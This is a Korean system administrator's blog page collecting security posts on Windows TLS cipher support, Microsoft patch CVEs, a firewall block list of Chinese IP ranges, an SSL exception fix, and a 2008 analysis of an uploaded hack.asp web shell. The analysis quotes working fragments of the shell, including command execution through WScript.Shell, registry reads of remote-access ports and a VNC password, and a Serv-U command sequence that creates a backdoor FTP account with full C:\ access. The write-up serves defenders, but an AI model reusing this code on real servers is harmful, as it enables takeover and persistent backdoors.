레이블이 Security인 게시물을 표시합니다. 모든 게시물 표시
레이블이 Security인 게시물을 표시합니다. 모든 게시물 표시

2022/10/12

Windows 8 / 2012 R2 TLS 1.2 Cipher suite (SSL/TLS 보안 채널 오류)

Windows 8 및 Windows Server 2012 R2 에서는,  아래와 같은 암호화 알고리즘을 지원하지 않는다. 지원은 Windows 10 및 Windows 2016 에서 부터이다.


https://learn.microsoft.com/en-us/windows/win32/secauthn/tls-cipher-suites-in-windows-8-1


# TLS 1.2 (suites in server-preferred order)

TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (0xc030)   ECDH x25519

TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)   ECDH x25519



일부 서버에서, TLS 보안 강화 목적으로, SSL 은 물론이고, TLS 1.2 1.3 에서 'WEAK' 알고리즘을 제거하는 경우가 종종 있다.

그런 웹서버(웹사이트)에 접속하는 경우, "요청이 중단되었습니다. SSL/TLS 보안 채널을 만들 수 없습니다." 라는 오류를 만날수 있다.  특히.. Windows 자체 라이브러리를 활용하는 Client의 경우..

Proxy 를 이용한다고 해도, IP/MAC 등 필수 변환 정보외 나머지 패킷을 원본 서버것 그대로 전달하기 때문에, 동일하게 오류가 발생한다.

물론 크롬등과 같이 자체적으로 모듈을 가지고 있는 경우에는, OS 와 상관없이 자체적으로 처리하므로 상관이 없을수 있다.

해결책은 뭐.. 자체 알고리즘을 가지고 자체 작동하는 라이브러리를 참조하거나,... 아니면.. OS 를 업그레이드 하던가....

해외 일부 커뮤니티에는... 레지스트리를 바꿔봐라 뭐 이런 내용이 있는데, OS 자체에서 라이브러리가 없는데, 레지스트리에 글자 추가해봐야 뭔소용...


Windows Server 2016 까지는, TLS 1.2 까지만 지원되며, TLS 1.3 은 Windows Server 2019 부터 지원된다. TLS 1.3이 필요하거나, 또는 어느 시점에 되면 하위 버전은 웹브라우저(크롬등등)에서 제외 될텐데, 그때가 되면, 또 어쩔수 없이 상위 OS 버전으로 업그레이드를 해야 한다.

TLS 1.3에서 활용되는 TLS_CHACHA20_POLY1305_SHA256 알고리즘은, Windows Server 2022 에서 부터 지원된다.



----- Windows Server 2012R2 에서 지원되는 알고리즘 목록 -----

TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_RSA_WITH_AES_256_GCM_SHA384
TLS_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P384
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA_P256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA_P384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA_P256
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA_P384
TLS_RSA_WITH_AES_256_CBC_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_RSA_WITH_AES_256_CBC_SHA
TLS_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384_P384
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA_P256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA_P384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA_P256
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA_P384
TLS_DHE_DSS_WITH_AES_256_CBC_SHA256
TLS_DHE_DSS_WITH_AES_128_CBC_SHA256
TLS_DHE_DSS_WITH_AES_256_CBC_SHA
TLS_DHE_DSS_WITH_AES_128_CBC_SHA
TLS_RSA_WITH_3DES_EDE_CBC_SHA
TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
TLS_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_MD5
TLS_RSA_WITH_NULL_SHA256
TLS_RSA_WITH_NULL_SHA
SSL_CK_RC4_128_WITH_MD5
SSL_CK_DES_192_EDE3_CBC_WITH_MD5







2022/02/17

클라우드플레어 2021년 4분기 DDoS 트렌드 보고서

서버 호스팅 업계등에서는 오래전 부터 익히 알려진 내용이긴 함..


- DDoS 공격의 상위 10가지 공격 벡터

- 대상 고객 설문조사에서 발견한 놀라운 결과

- 4분기에 가장 큰 타격을 입은 산업


https://content.cloudflare.com/NzEzLVhTQy05MTgAAAGCo_YB5btHehUeFPakLm2OO15MkixKQBzVxoS_BTauZ_VL7rqDN9KYqRx4d-ut_VgS9NO5W4M=




2020/03/11

2020년 03월 MS 취약점 패치 주요 사항

서버쪽에서 유의해야 하는 패치는 아래 정도이고, 그외는 별 의미 없음

CVE-2020-0645 | Microsoft IIS Server 변조 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2020-0645




2019/08/14

2019년 8월 MS 취약점 패치 주요 사항

배포된 여러 취약점중에, 서버를 운영하는 경우 아래와 같은 취약점은 패치 적용을 꼭 진행하는 것이 좋습니다.

CVE-2019-0714 | Windows Hyper-V 서비스 거부 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-0714

CVE-2019-0720 | Hyper-V 원격 코드 실행 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-0720

CVE-2019-1181 | 원격 데스크톱 서비스 원격 코드 실행 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-1181

CVE-2019-1206 | Windows DHCP 서버 서비스 거부 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-1206

CVE-2019-1224 | 원격 데스크톱 프로토콜 서버 정보 유출 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-1224

CVE-2019-9511 | HTTP/2 Server 서비스 거부 취약성
https://portal.msrc.microsoft.com/ko-KR/security-guidance/advisory/CVE-2019-9511



2017/04/17

중국 주요 IP 할당 대역 (방화벽 차단용)

IP 할당 블럭중에, 한국쪽으로 해킹/스캔 이력이 있었거나 넓은 폭으로 중국에서 할당 받은 대역 목록.

해외에서 해킹 접속건이 가장 많고 빈번한 곳이 중국으로, 중국쪽에 접속 서비스를 하지 않으면서  접근 시도가 있는 경우 방화벽에서 차단해 보는 것도 좋음.  (차단 목록이 많으므로 대량 접속 서버/방화벽에서는 부하를 잃으킬 수 있으니 주의 필요)

 

14.16.0.0-14.31.255.255,
14.103.0.0-14.127.255.255,
14.144.0.0-14.159.255.255,
27.184.0.0-27.227.255.255,
36.96.0.0-36.223.255.255,
39.64.0.0-39.108.255.255,
39.128.0.0-39.191.255.255,
42.128.0.0-42.143.255.255,
42.156.36.0-42.187.123.255,
42.202.0.0-42.240.255.255,
47.92.0.0-47.127.255.255,
49.64.0.0-49.95.255.255,
58.30.0.0-58.63.255.255,
58.192.0.0-58.223.255.255,
58.240.0.0-58.255.255.255,
59.32.0.0-59.83.255.255,
59.192.0.0-60.31.255.255,
60.160.0.0-60.191.255.255,
60.200.0.0-60.223.255.255,
61.128.0.0-61.191.255.255,
61.232.0.0-61.237.255.255,
61.240.0.0-61.243.255.255,
101.4.0.0-101.7.255.255,
101.16.0.0-101.49.255.255,
101.64.0.0-101.78.3.255,
101.80.0.0-101.96.11.255,
101.104.0.0-101.107.255.255,
101.120.0.0-101.126.255.255,
101.129.0.0-101.135.255.255,
101.144.0.0-101.159.255.255,
101.192.0.0-101.201.255.255,
101.224.0.0-101.233.255.255,
101.236.0.0-101.249.255.255,
101.251.8.0-101.254.255.255,
103.32.0.0-103.35.51.255,
106.2.0.0-106.9.255.255,
106.11.0.0-106.50.255.255,
106.52.0.0-106.63.255.255,
106.80.0.0-106.95.255.255,
106.108.0.0-106.127.255.255,
106.224.0.0-106.239.255.255,
110.16.0.0-110.19.255.255,
110.40.0.0-110.43.255.255,
110.51.0.0-110.53.255.255,
110.56.0.0-110.65.255.255,
110.80.0.0-110.91.255.255,
110.94.0.0-110.127.255.255,
110.152.0.0-110.157.255.255,
110.176.0.0-110.223.255.255,
110.240.0.0-111.63.255.255,
111.72.0.0-111.79.255.255,
111.112.0.0-111.117.255.255,
111.126.0.0-111.167.255.255,
111.172.0.0-111.183.255.255,
111.192.0.0-111.215.255.255,
111.224.0.0-111.231.255.255,
112.0.0.0-112.63.162.115,
112.63.162.152-112.67.255.255,
112.80.0.0-112.103.255.255,
112.192.0.0-112.195.255.255,
112.224.0.0-113.9.255.255,
113.12.0.0-113.18.255.255,
113.24.0.0-113.27.255.255,
113.44.0.0-113.51.255.255,
113.54.0.0-113.59.127.255,
113.62.0.0-113.129.255.255,
113.132.0.0-113.143.255.255,
113.218.0.0-113.251.255.255,
114.80.0.0-114.107.255.255,
114.208.0.0-114.255.255.255,
115.44.0.0-115.63.255.255,
115.100.0.0-115.107.255.255,
115.148.0.0-115.159.255.255,
115.168.0.0-115.175.255.255,
115.190.0.0-115.239.255.255,
116.1.0.0-116.11.255.255,
116.16.0.0-116.31.255.255,
116.52.0.0-116.57.255.255,
116.128.0.0-116.192.255.255,
116.228.199.140-116.236.185.219,
116.242.0.0-116.249.255.255,
117.8.0.0-117.15.255.255,
117.21.0.0-117.45.255.255,
117.59.0.0-117.73.255.255,
117.74.128.0-117.95.255.255,
117.112.0.0-117.119.255.255,
117.124.0.0-117.191.255.255,
118.72.0.0-118.81.255.255,
118.112.0.0-118.126.255.255,
118.193.96.0-118.199.255.255,
118.224.0.0-118.230.255.255,
118.244.0.0-119.2.31.255,
119.2.128.0-119.8.255.255,
119.27.0.0-119.40.255.255,
119.48.0.0-119.55.255.255,
119.84.0.0-119.91.255.255,
119.96.0.0-119.103.255.255,
119.112.0.0-119.147.255.255,
119.148.160.0-119.148.191.255,
119.161.120.0-119.167.255.255,
119.176.0.0-119.191.255.255,
119.252.240.0-120.15.255.255,
120.30.0.0-120.49.255.255,
120.64.0.0-120.71.255.255,
120.76.0.0-120.87.255.255,
120.128.0.0-120.135.255.255,
120.192.0.0-120.255.255.255,
121.8.0.0-121.43.255.255,
121.192.0.0-121.199.255.255,
121.224.0.0-121.239.255.255,
122.4.0.0-122.8.255.255,
122.64.0.0-122.97.255.255,
122.136.0.0-122.143.255.255,
122.188.0.0-122.195.255.255,
122.226.204.104-122.247.255.255,
123.4.0.0-123.15.255.255,
123.52.0.0-123.59.255.255,
123.64.0.0-123.98.127.255,
123.112.0.0-123.135.255.255,
123.144.0.0-123.175.255.255,
123.249.0.0-123.249.255.255,
124.67.0.0-124.79.255.255,
124.88.0.0-124.95.255.255,
124.112.0.0-124.119.255.255,
124.126.0.0-124.135.255.255,
124.160.0.0-124.167.255.255,
124.200.0.0-124.207.255.255,
124.220.0.0-124.240.191.255,
125.31.192.0-125.47.255.255,
125.64.0.0-125.98.255.255,
125.104.0.0-125.127.255.255,
125.216.0.0-125.223.255.255,
139.196.0.0-139.215.255.255,
171.8.0.0-171.15.255.255,
171.34.0.0-171.47.255.255,
171.80.0.0-171.95.255.255,
171.104.0.0-171.127.255.255,
171.208.0.0-171.223.255.255,
175.0.0.0-175.27.255.255,
175.46.0.0-175.95.255.255,
175.146.0.0-175.155.255.255,
175.160.0.0-175.175.255.255,
175.185.0.0-175.191.255.255,
180.95.128.0-180.127.255.255,
180.136.0.0-180.143.255.255,
180.152.0.0-180.168.81.51,
180.168.170.80-180.175.255.255,
182.32.0.0-182.47.255.255,
182.96.0.0-182.151.255.255,
182.200.0.0-182.207.255.255,
182.240.0.0-182.247.255.255,
183.0.0.0-183.71.255.255,
183.128.0.0-183.170.255.255,
183.184.0.0-183.255.255.255,
202.97.128.0-202.120.24.223,
202.120.25.0-202.122.7.255,
202.192.243.0-202.207.255.255,
210.25.0.0-210.31.210.3,
210.31.210.8-210.47.255.255,
210.72.0.0-210.78.255.255,
211.64.0.0-211.71.255.255,
211.80.0.0-211.103.255.255,
211.136.0.0-211.160.50.255,
211.160.54.0-211.167.255.255,
218.0.0.0-218.30.55.255,
218.56.0.0-218.80.233.127,
218.80.233.132-218.99.255.255,
218.104.0.0-218.109.255.255,
218.192.0.0-218.207.255.255,
218.240.0.0-218.247.255.255,
219.128.0.0-219.159.255.255,
219.216.0.0-219.239.255.255,
219.242.0.0-219.247.255.255,
220.160.0.0-220.207.255.255,
220.248.0.0-220.252.255.255,
221.0.0.0-221.12.191.255,
221.172.0.0-221.183.255.255,
221.192.0.0-221.199.207.255,
221.199.224.0-221.239.255.255,
222.16.0.0-222.68.180.211,
222.68.180.216-222.95.255.255,
222.128.0.0-222.143.255.255,
222.168.0.0-222.223.255.255,
222.240.0.0-222.249.255.255,
223.0.0.0-223.15.255.255,
223.64.0.0-223.117.255.255,
223.120.0.0-223.129.255.255,
223.144.0.0-223.163.255.255,
223.208.0.0-223.215.255.255,
223.240.0.0-223.251.255.255

 


2016/06/17

System.Security.Authentication.AuthenticationException: SSPI 예외

처리되지 않은 예외: System.Security.Authentication.AuthenticationException: SSPI를 호출하지 못했습니다. 내부 예외를 참조하십시오. ---> System.ComponentModel.Win32Exception: 예기치 않은 메시지를 받았거나 메시지의 형식이 잘못되었습니다
  --- 내부 예외 스택 추적의 끝 ---
  위치: System.Net.Security.SslState.CheckThrow(Boolean authSucessCheck)
  위치: System.Net.Security.SslState.get_SecureStream()
  위치: System.Net.Security.SslStream.Write(Byte[] buffer)

 

=> 원인은, 서버쪽에 설정된 SSL 관련 암호화 모듈중에, "SSL" 버젼 또는 "Tls" 버젼 일부를 비활성화(또는 제거) 설정되어 있기 때문에 서버쪽에서 허용 가능한 "SslProtocols" 버젼을 설정해서 AuthenticateAsClient 인증을 받아야 함.

보안에 취약한 "SSL" 및 "Tls" 버젼을 제거하는 것이 권장되고 있으며, 설정이 적용된 지원하지 않는 서버들이 증가하고 있다.

참고 :
How to disable PCT 1.0, SSL 2.0, SSL 3.0, or TLS 1.0 in Internet Information Services
https://support.microsoft.com/en-us/kb/187498

 

 => 그러면,.  고정된 서버에 접근하지 않고 익명의 다중 원격 서버에 접근하는 경우, 지원 버젼을 매번 알아낼수가 없다. 그래서 아래와 같은 or 형태로 지정을 해준다.

 

sslStream.AuthenticateAsClient(_host, certcoll,  SslProtocols.Tls | SslProtocols.Tls11 | SslProtocols.Tls12, false);

 

 


2008/04/02

해킹사례 - 강력한 기능의 hack.asp 파일 업로드를 이용한 서버 점령

다음은,. SQL Injection 또는 자료실 업로드 취약점을 이용해서 해킹에 필요한 기본적인 파일을 업로드후 시스템 전체를 좌지우지 할수 있는 매우 다양한 기능의 asp 파일에 관련된 내용입니다.

실제 해킹을 당했던 서버는, 아래 설명되는 툴을 이용해서 서버에 설치된 FTP 서버중 하나인 Sever-U 의 명령줄 기능을 이용해서 추가적인 백도어 설치를 한 경우 입니다.

asp 파일은 올리지 않겠습니다. 뭐 중국어권 인터넷에서 쉽게 구할수 있는 내용이지만 2차 해킹에 이용이 가능하므로..., 더군다나 그 기능이 워낙 강력해서....-_-;;



<그림. 로그인 화면>


로그인 패스워드는 소스코드를 열어보면,.

hu="AD=chr(34)&&&&&&&&&&&chr(34)貊Copyright=chr(34)鬼羚-----膽뺏경,헝蕎痰黨렷랬痰槁!chr(34)貊mName=chr(34)Fuck the world!   (膽뺏경)chr(34)           貊UserPass=chr(34)wocaonimadebchr(34)貊"
hu = Replace(hu, "chr(34)", chr(34))
hu = Replace(hu, "chr(39)", chr(39))

소스 코드를 열어보면 정말 다양한 기능이 있음을 알수 있지만, 일단 로그인을 하면 대략 눈 앞에 펼쳐져 보이는 내용을 둘러 보는게...




각 부분을 살펴보기 전에 asp 파일을 이용해서 위와 같은 디렉토리 내용을 가져 올수 있는 이유는 해당 서버에 권한 설정값이 너무 유연? 아니 너무 제한이 없기 때문입니다.

1번. 이 부분은 여러가지 다양한 기능을 수행할수 있는 메뉴들 입니다. 그럼 소스 코드를 대충 살펴 보면 어떤 기능을 가능하지 볼까요?..

ObT(0,0) = "Scripting.FileSystemObject"
  ObT(0,2) = "匡숭꾸鱗莉숭"
ObT(1,0) = "wscript.shell"
  ObT(1,2) = "츱즈契獵契莉숭"
ObT(2,0) = "ADOX.Catalog"
  ObT(2,2) = "ACCESS쉔욋莉숭"
ObT(3,0) = "JRO.JetEngine"
  ObT(3,2) = "ACCESS箕鍵莉숭"
ObT(4,0) = "Scripting.Dictionary"
  ObT(4,2) = "鑒앴직눈릅燎莉숭"
ObT(5,0) = "Adodb.connection"
  ObT(5,2) = "鑒앴욋젯쌈莉숭"
ObT(6,0) = "Adodb.Stream"
  ObT(6,2) = "鑒앴직눈莉숭"
ObT(7,0) = "SoftArtisans.FileUp"
  ObT(7,2) = "SA-FileUp 匡숭눈莉숭"
ObT(8,0) = "LyfUpload.UploadFile"
  ObT(8,2) = "증暾룟匡숭눈莉숭"
ObT(9,0) = "Persits.Upload.1"
  ObT(9,2) = "ASPUpload 匡숭눈莉숭"
ObT(10,0) = "JMail.SmtpMail"
  ObT(10,2) = "JMail 錟숭澗랙莉숭"
ObT(11,0) = "CDONTS.NewMail"
  ObT(11,2) = "肯콰SMTP랙斤莉숭"
ObT(12,0) = "SmtpMail.SmtpMail.1"
  ObT(12,2) = "SmtpMail랙斤莉숭"
ObT(13,0) = "Microsoft.XMLHTTP"
  ObT(13,2) = "鑒앴눈渴莉숭"


소스코드에서는 와 14가지 객체를 이용하는 코드가 구현되어 있습니다. 파일 I/O 작업, 스크립트 실행, 컴포넌트, 메일, Soap 통신.. 그리고 알수 없는 추가 컴포넌트....

물론,. 이러한 기능 항목에 해당 컴포넌트나 객체의 인스턴스 생성이 가능한 항목을 이용하겠지요.

2번. 3번 항목과 함께 웹 인터페이스로 구현을 해놓은 디렉토리 탐색기 입니다. 2번은 현재 위치의 디렉토리 목록이며 디렉토리명 클릭시 이동이 가능합니다.

3번은 현재 위치의 디렉토리에 있는 파일 리스트 입니다. 웹사이트 구조를 한눈에 파악할수 있을 뿐만 아니라 "부모경로 허용" 이 되어 있고 권한 설정이 잘 되어 있지 않다면 C:\ 도 자유자재로 넘나들수 있습니다.

그런데 여기서 단순하게 탐색기 기능만 가능한 것은 아닙니다. 실제 폴더나 파일명은 [Copy Del Move Down] 4가지 조작이 가능합니다.

물론 SQL 조작 기능은 기본이겠고요..

javascript:ShowFolder("""&RePath(WWWRoot)&""")
javascript:ShowFolder("""&RePath(RootPath)&""")
javascript:ShowFolder(""C:\\Progra~1"")
javascript:ShowFolder(""C:\\Docume~1"")
javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere"")
javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\「역迦」꽉데\\넋埼"")
javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")
javascript:FullForm("""&RePath(Session("FolderPath")&"\New.mdb")&""",""CreateMdb"")
javascript:FullForm("""&RePath(Session("FolderPath")&"\data.mdb")&""",""CompactMdb"")

Action=ouou' target='FileFrame'
Action=Course' target='FileFrame'
Action=ServerInfo' target='FileFrame'

Action=fuck'   target='FileFrame'
if Instr(Pathinfo,"perl") Then Response.Write "<li>Perl신굶:連넣<br>"
if instr(Pathinfo,"java") Then Response.Write "<li>Java신굶:連넣<br>"
if instr(Pathinfo,"microsoft sql server") Then Response.Write "<li>MSSQL鑒앴욋륩蛟:連넣<br>"
if instr(Pathinfo,"mysql") Then Response.Write "<li>MySQL鑒앴욋륩蛟:連넣<br>"
if instr(Pathinfo,"oracle") Then Response.Write "<li>Oracle鑒앴욋륩蛟:連넣<br>"
if instr(Pathinfo,"cfusionmx7") Then Response.Write "<li>CFM륩蛟포:連넣<br>"
if instr(Pathinfo,"pcanywhere") Then Response.Write "<li>힙쳔屆옹PcAnywhere왠齡:連넣<br>"
if instr(Pathinfo,"Kill") Then Response.Write "<li>Kill뗀흡숭:連넣<br>"
if instr(Pathinfo,"kav") Then Response.Write "<li>쏜溝죗뗀흡숭:連넣<br>"
if instr(Pathinfo,"antivirus") Then Response.Write "<li>힙쳔屆옹뗀흡숭:連넣<br>"
if instr(Pathinfo,"rising") Then Response.Write "<li>흩槿溝죗뗀흡숭:連넣<br>"

Action=hook'   target='FileFrame'

Action=gody' target='FileFrame'
      if objService.Name="Serv-U" Then
        if objService.ServiceAccountName="LocalSystem" Then
      if lcase(objService.Name)="apache2.2" or lcase(objService.Name)="apache" Then
      if instr(lcase(objService.Name),"tomcat") Then
        if objService.ServiceAccountName="LocalSystem" Then
       if instr(lcase(objService.Name),"winmail") Then


Action=getTerminalInfo' target='FileFrame'
Set wsh = Server.CreateObject("WScript.Shell")
Telnetkey="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\TelnetPort"
TlntPort=Wsh.RegRead(TelnetKey)
if TlntPort="" Then Tlnt="23"
Response.Write "<li>Telnet똥왯:"&Tlntport&"<br>"
TermKey="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\
Wds\rdpwd\Tds\tcp\PortNumber"
TermPort=Wsh.RegRead(TermKey)
If TermPort="" Then TermPort="轟랬뗍혤.헝횅훰角뤠槨Windows Server경굶寮샙"
Response.Write "<li>Terminal Service똥왯槨:"&TermPort&"<br>"
pcAnywhereKey="HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\pcAnywhere\
CurrentVersion\System\TCPIPDataPort"
PAWPort=Wsh.RegRead(pcAnywhereKey)
If PAWPort="" then PAWPort="轟랬삿혤.헝횅훰寮샙角뤠갛陋pcAnywhere"
Response.Write "<li>PcAnywhere똥왯槨:"&PAWPort&"<br>"

Action=fish' target='FileFrame'
Action=ScanPort' target='FileFrame

Action=Cmd1Shell' target='FileFrame'
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject(ObT(1,0))
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa

Action=UpFile' target='FileFrame'
Action=searchfile' target='FileFrame'

Action=Servu' target='FileFrame'
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=webserver" & vbCrLf & "-Password=hook" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf


Action=ReadREG' target='FileFrame'
RRS "<input name=thePath value='HKCU\Software\ORL\WinVNC3\Password' size=80>"
PortList="21,23,25,53,80,110,135,139,445,1433,1521,1723,2976,3306,3389,4899,5631,5800,
5900,8000,8080,8383,43958"

Action=kmuma' target='FileFrame'
Action=Cplgm&M=1' target='FileFrame'
Action=Cplgm&M=2' target='FileFrame'
Action=Cplgm&M=3' target='FileFrame'
Action=plgm' target='FileFrame'

다음과 같은 파일명들에 iframe 삽입

retVal=IsPattern("('file://\\|\/)(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|diy|no|ok|del|config|
sql|user|ubb|ftp|asp|top|new|open|name|email|img|images|web|blog|save|data|add|edit|
game|about|manager|book|bt|
config|mp3|vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|
view|ip|err404|send|foot|char|info|list|
shop|err|nc|ad|flash|text|admin_upfile|admin_upload|upfile_load|upfile_soft|upfile_photo|
upfile_softpic|vip|505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr'>

이정도 기능을 가진 파일이 업로드된 상태에서,
웹익명 계정에 대해서 권한이 취약하게 되어 있다면 게임 오버!....



01-web-hack-1.gif
01-web-hack-2.gif

가장 많이 본 글